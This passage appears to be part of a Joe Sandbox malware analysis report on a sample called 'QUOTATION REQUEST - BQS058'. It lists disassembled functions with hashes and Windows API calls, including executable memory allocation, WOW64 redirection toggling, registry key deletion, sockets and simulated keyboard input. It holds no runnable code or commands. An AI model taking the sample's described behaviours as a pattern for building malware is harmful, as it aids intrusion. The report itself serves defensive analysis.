Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 14be9dc689ce0f30246bef28701f7cde05ff096aa1da1a4702e12b257c23d5d0
Instruction ID: 98d1e383885faa6be54d8c8981198e0d9ec88b7d8ded53d6cced037c30d5466b
Opcode Fuzzy Hash: 14be9dc689ce0f30246bef28701f7cde05ff096aa1da1a4702e12b257c23d5d0
Instruction Fuzzy Hash: D811E372240209BAEF655E65DC05FEB7BA9FF88B54F014119FA81A6090D672E411DB20

Function 00FD4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FD4B83,?), ref: 00FD4C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FD4C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00FD4C50
kernel32.dll, xrefs: 00FD4C3F

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: f50a7139c0eb3c6b488e0dbcf65d32ec720a53d994fce10f8538c402fec79357
Instruction ID: 03431def4457027663ff41f33a775008bc5094e4ffb0d12f1023067bcc14e31f
Opcode Fuzzy Hash: f50a7139c0eb3c6b488e0dbcf65d32ec720a53d994fce10f8538c402fec79357
Instruction Fuzzy Hash: 51D01270911713CFD7205F32D91860777D5AF05251B15882E94E5DA614E678D880C754

Function 01050DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,01051039), ref: 01050DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01050E07

Strings

RegDeleteKeyExW, xrefs: 01050E01
advapi32.dll, xrefs: 01050DF0

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: beb25c94d655b79683f2fde2988061d6f3bae58c4b88ba4316944dacffe4a564
Instruction ID: a8b12a1aa8194a33a73b2c0907bf8b99cb220c6e099f5426bcd5883f7cda8759
Opcode Fuzzy Hash: beb25c94d655b79683f2fde2988061d6f3bae58c4b88ba4316944dacffe4a564
Instruction Fuzzy Hash: C2D0C730400323CFD320AF7AC80828B76E4AF01352F208C2EA8C2C6104E7B9D090CB64

Function 00FD4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FD4BD0,?,00FD4DEF,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FD4C23

Strings

kernel32.dll, xrefs: 00FD4C0C
Wow64DisableWow64FsRedirection, xrefs: 00FD4C1D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: a2a9a57c4872d9df309bd5f0c0ec1ae0623836490ec6e1057449d75fddbcb196
Instruction ID: 8e8beba90252b50a7e949639fda30149a5f4676c639f6a9f248ecccbea8ef78b
Opcode Fuzzy Hash: a2a9a57c4872d9df309bd5f0c0ec1ae0623836490ec6e1057449d75fddbcb196
Instruction Fuzzy Hash: D1D01230911713CFD7206F71D958607B6D6EF09251F158C2E94C5D6610E7B8D880CB51

Function 010490E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,01048CF4,?,0105F910), ref: 010490EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01049100

Strings

kernel32.dll, xrefs: 010490E9
GetModuleHandleExW, xrefs: 010490FA

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: db61ed2719db1138da3980566bb7511984e2ac9f2bc0eaf56dc2acf08d7606b3
Instruction ID: b50fe62b68b70411283afb46eade65b4250ef3de0d25fe4e44c5ea285688042d
Opcode Fuzzy Hash: db61ed2719db1138da3980566bb7511984e2ac9f2bc0eaf56dc2acf08d7606b3
Instruction Fuzzy Hash: 41D01774510713CFEB30AF36D86860776E4AF0A255B12C87E9AC6DA950E6B9C4C0CB90

Function 01011714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 01011718
__swprintf.LIBCMT ref: 01011749

Strings

%.3d, xrefs: 01011723
WIN_XPe, xrefs: 01011788

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: b73eb98e0d81e71e48318c2df3d551e57e00af45e7de83aef81db04959e734e3
Instruction ID: 36dabb3a8b86b1368145be736fe4a6917e30703db695cb7f8237b9092f018ac5
Opcode Fuzzy Hash: b73eb98e0d81e71e48318c2df3d551e57e00af45e7de83aef81db04959e734e3
Instruction Fuzzy Hash: ECD05B7180910DFACB18AAA09C8CCFE737CBB08201F040452F786D2244E23DC794D721

Function 0102717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6618c45b98a17a860198018b6e612672167263d1bb4fda9d7480728d426565
Instruction ID: 7686dd5431c721fce9b2904f4ae8b4ba42e86d296dd1b89176280cb7221b202b
Opcode Fuzzy Hash: ca6618c45b98a17a860198018b6e612672167263d1bb4fda9d7480728d426565
Instruction Fuzzy Hash: 08C17074A00226EFDB14CF98C884EAEBBF5FF48714B148599E945EB251DB31ED81CB90

Function 0104E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0104E0BE
CharLowerBuffW.USER32(?,?), ref: 0104E101

Part of subcall function 0104D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0104D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0104E301
_memmove.LIBCMT ref: 0104E314

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: c87be5cd0e6b629b828325188ec5d83ed976ad93f87675ba859b8d3c43c45a14
Instruction ID: 5183cbbfa81da16440bfdf5841f0f0642f6fdc6da9bbde410505761304974ea4
Opcode Fuzzy Hash: c87be5cd0e6b629b828325188ec5d83ed976ad93f87675ba859b8d3c43c45a14
Instruction Fuzzy Hash: A0C18AB1A08301DFC744DF28C48096ABBE5FF89714F04896EF9999B362D734E945CB82

Function 01048093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 010480C3
CoUninitialize.OLE32 ref: 010480CE

Part of subcall function 0102D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0102D5D4

VariantInit.OLEAUT32(?), ref: 010480D9
VariantClear.OLEAUT32(?), ref: 010483AA

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 346830aff2f794844f22416a1fe94e8a95a5a84f31b7629d11a957d140aff482
Instruction ID: 6a53beeebf1d5b83e01be05fc9f98ba69ff811efaae44fd40522032a5d1a9f0a
Opcode Fuzzy Hash: 346830aff2f794844f22416a1fe94e8a95a5a84f31b7629d11a957d140aff482
Instruction Fuzzy Hash: 19A15BB56047019FDB50EF94C880A2EB7E5BF89714F48885EFA959B3A1CB74ED00DB42

Function 01027530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01062C7C,?), ref: 010276EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01062C7C,?), ref: 01027702
CLSIDFromProgID.OLE32(?,?,00000000,0105FB80,000000FF,?,00000000,00000800,00000000,?,01062C7C,?), ref: 01027727
_memcmp.LIBCMT ref: 01027748

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 40c0a72cd1cee67c5613da8c2ff520c24d9dc14cd26406fa0775b3407ad8b06d
Instruction ID: cf77bfcaf2a5fc520d989a0c4c23cdec14c5993423bbedd46a3e5362a4434de3
Opcode Fuzzy Hash: 40c0a72cd1cee67c5613da8c2ff520c24d9dc14cd26406fa0775b3407ad8b06d
Instruction Fuzzy Hash: 95814E71A00119EFCB04DFA8C988DEEB7B9FF89315F204598F545AB250DB71AE06CB60

Function 0102687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0102688E
SysAllocString.OLEAUT32(00000000), ref: 01026937
VariantCopy.OLEAUT32 ref: 01026966
VariantClear.OLEAUT32(?), ref: 0102698D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 5e77c8b7fbbdd833837a00755bda9ae80784b64bde0ca44078a2ef2b6c6a742e
Instruction ID: f2312bd8bce420c4903e2ef8439e2f640a694de947b79506ed75c25874154817
Opcode Fuzzy Hash: 5e77c8b7fbbdd833837a00755bda9ae80784b64bde0ca44078a2ef2b6c6a742e
Instruction Fuzzy Hash: AF51A6747043129ADB64AFAAD8A167EB7E9AF44310F14C81FE9C6C7291DF76D840CB01

Function 010597F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(01580FE8,?), ref: 01059863
ScreenToClient.USER32(00000002,00000002), ref: 01059896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01059903

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: e32d7893ab4f775df11353f3d447cdf30cc84f7dd57b5beee217e819259da9b2
Instruction ID: 228a651ee62c3dc7fa7b2bd857028b1eef799c1323c7a96bbaec58757d174e82
Opcode Fuzzy Hash: e32d7893ab4f775df11353f3d447cdf30cc84f7dd57b5beee217e819259da9b2
Instruction Fuzzy Hash: 37514F34A00209EFCF61CF68C884AAF7BF6FF45364F148199F9A59B291D731A941CB90

Function 01029A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 01029AD2
__itow.LIBCMT ref: 01029B03

Part of subcall function 01029D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 01029DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 01029B6C
__itow.LIBCMT ref: 01029BC3

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 603ba99a8e51320f03a953061017a85059d4146202142866540dd1b5bb8b811a
Instruction ID: 83b6473e04fbb3d6e4f2163fd0ebd751f22fa45a082f9646ca8d18fc93a6ed00
Opcode Fuzzy Hash: 603ba99a8e51320f03a953061017a85059d4146202142866540dd1b5bb8b811a
Instruction Fuzzy Hash: 1941B170A00328ABDF11EF54CC45BEE7BFAEF44714F44005AF945A7291DB749944CBA1

Function 010469AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 010469D1
WSAGetLastError.WSOCK32(00000000), ref: 010469E1

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01046A45
WSAGetLastError.WSOCK32(00000000), ref: 01046A51

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: e8730dbbb1a8c8e3f35b801eed4c2992367ea35577d5e6c49c6b6fa25cdf543d
Instruction ID: a67dc588cb1a84d453baa34bc6348d40b69e27d96f697de95e18212aea9a093a
Opcode Fuzzy Hash: e8730dbbb1a8c8e3f35b801eed4c2992367ea35577d5e6c49c6b6fa25cdf543d
Instruction Fuzzy Hash: B741B2757002006FEB60BF68CC86F7E77E69B05B10F488059FA599B3C2DAB99D019B51

Function 0104641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0105F910), ref: 010464A7
_strlen.LIBCMT ref: 010464D9

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: c8d890627749ffdc262ac5ec9e51faf4bf2d7a41765b76f7e8e186d647ab8658
Instruction ID: 0904b08a099badb213b49b57f8560af5666e578afbb2cd20688c3e56b643f4af
Opcode Fuzzy Hash: c8d890627749ffdc262ac5ec9e51faf4bf2d7a41765b76f7e8e186d647ab8658
Instruction Fuzzy Hash: 2841F671500105ABCB10FBA8DCD5FFEB7A9AF45310F04816AF95697392EB35AD04D790

Function 0103B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0103B89E
GetLastError.KERNEL32(?,00000000), ref: 0103B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0103B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0103B915

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: e93cc317e80b0af44b9b1d1f9a9a0c1a3c6ad98c61026cda8564e578550680dd
Instruction ID: 8706bd85f555fd41b08c7063b0d28ec896ee2603139d0f317dcdc92c921a9ec2
Opcode Fuzzy Hash: e93cc317e80b0af44b9b1d1f9a9a0c1a3c6ad98c61026cda8564e578550680dd
Instruction Fuzzy Hash: 37414F39A00611DFCB11EF54C444A5DBBE6EF89714F498089EC8A9B362CB78FD01EB91

Function 01058851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010588DE

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 75c16dc7a370d05d732192848e516e14dacb0c461f04fc50542c749c53601653
Instruction ID: 62cdbc4c0023fc2f1946e63a7370310b3e0fbe512d9b831e5370bce46db5a397
Opcode Fuzzy Hash: 75c16dc7a370d05d732192848e516e14dacb0c461f04fc50542c749c53601653
Instruction Fuzzy Hash: 7031C534600109FEEBE19A6ADC45BAF7BB5FB06350F588143FED1E6291C63595408B52

Function 0105AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0105AB60
GetWindowRect.USER32(?,?), ref: 0105ABD6
PtInRect.USER32(?,?,0105C014), ref: 0105ABE6
MessageBeep.USER32(00000000), ref: 0105AC57

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: efb43e83c6493c5af6c5991d173c34118f3eec44eda928ad65495473e78d3864
Instruction ID: 1795a8ba71c474fdcb0d693e5a1c17ede5b3ec45c6533a1f39bd345c42e261ca
Opcode Fuzzy Hash: efb43e83c6493c5af6c5991d173c34118f3eec44eda928ad65495473e78d3864
Instruction Fuzzy Hash: 6141AB34B00209DFDBA2CF58C884BAA7FF5FF48300F1882A9E9959F255D731A841CB90

Function 01030AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01030B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 01030B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 01030BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 01030BFB

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
